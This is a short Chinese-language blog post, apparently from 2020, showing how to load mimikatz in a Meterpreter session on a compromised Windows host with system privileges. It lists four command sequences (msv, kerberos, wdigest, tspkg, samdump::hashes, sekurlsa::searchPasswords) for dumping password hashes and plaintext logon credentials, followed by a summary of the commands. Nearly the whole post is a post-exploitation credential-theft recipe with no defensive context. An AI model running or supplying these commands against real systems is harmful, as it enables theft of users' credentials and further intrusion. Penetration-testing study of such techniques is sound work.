meterpreter中使用mimikatz获取windows密码

进去meterpreter后getuid一下

这获得系统管理员权限

开始

加载mimikatz模块

load mimikatz

加载成功.

第一种方法:

获取登录密码的hash值

msv

上面已经是得到hash值了. 下面算明文密码.

获取明文密码

kerberos

look...拿到登录的明文密码了.

第二种方法:

使用另一种方式获取哈希值

mimikatz_command -f samdump::hashes

根据上面的方式获取明文密码

mimikatz_command -f sekurlsa::searchPasswords

第三种方法:

Wdigest命令

这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.

wdigest

第四种方法:

tspkg命令

tspkg

 

总结

一、
load mimikatz #加载mimikatz
msv #获取hash值
kerberos #获取明文

二、
load mimikatz #加载mimikatz
wdigest #获取系统账户信息

三、
load mimikatz #加载mimikatz
tspkg #获取系统账户信息

四、
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords

 

posted @ 2020-07-01 14:54  浅笑996  阅读(1092)  评论(0编辑  收藏  举报